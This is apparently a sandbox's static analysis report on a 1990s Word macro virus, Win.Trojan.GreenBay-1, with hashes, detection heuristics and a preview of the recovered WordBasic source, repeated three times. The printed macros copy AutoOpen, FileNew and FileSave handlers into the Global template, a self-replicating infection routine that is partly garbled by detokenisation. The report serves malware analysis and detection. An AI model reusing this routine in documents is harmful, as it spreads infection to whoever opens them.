Win.Trojan.GreenBay-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 4436f0b4eb5f287f…

MALICIOUS

Office (OLE)

8.0 KB First seen: 2012-06-14
MD5: 551fbc57dea9c01bc4c9f6f9c7b90850 SHA-1: 5f33f56a816363f7c1015944fc65baf6399a8154 SHA-256: 4436f0b4eb5f287fb50699fec4ba88d1a8fefd711161e232964887e3fc5f21d0
102 Risk Score

Malware Insights

Win.Trojan.GreenBay-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits legacy WordBasic macro virus markers and is detected by ClamAV as Win.Trojan.GreenBay-1. The document body contains numerous references to macro functions such as AutoOpen, FileNew, and FileSave, strongly suggesting the presence and intended execution of malicious macros within the document.

Heuristics 3

  • ClamAV: Win.Trojan.GreenBay-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.GreenBay-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Recovered legacy WordBasic macro source info OLE_LEGACY_WORDBASIC_MACRO_SOURCE
    The Word 6.0/95 document stores tokenised WordBasic macros in the WordDocument stream rather than as a modern VBA project, so VBA source extraction cannot see them. The macro source was detokenised and carved so its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
wordbasic_macros.txt wordbasic-macro analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source) 1832 bytes
SHA-256: b3cd245ef2ae9a824fd40092023544322eeb26304fb3b11e2799bf894c7f9dcd
Preview script
First 1,000 lines of the extracted script
= = = , = 20069 21349 =
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=
MAIN
, - * ErrorHandler
@cmd0056 = "Green Bay Packers -- Super Bowl XXXI Champions"
FName$ = @cmd8025
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 MacName$ , "Global:AutoOpen"
@cmd80c2 MacName$ , "Global:FileNew"
@cmd80c2 MacName$ , "Global:FileSave"
=
29285
, - * AutoOpenHandler
MacName$ = FName$ = ":AutoOpen"
@cmd80c2 "Global:AutoOpen" , MacName$
29285
, - * FileNewHandler
MacName$ = FName$ = ":FileNew"
@cmd80c2 "Global:FileNew" , MacName$ 20069
29285
, - * FileSaveHandler
MacName$ = FName$ = ":FileSave"
@cmd80c2 "Global:FileSave" , MacName$ 21349
29285
@cmd0054 = 1
=      
, - * 0
, - * EndCode
=

Open this report in the interactive analyzer, or submit your own file for analysis.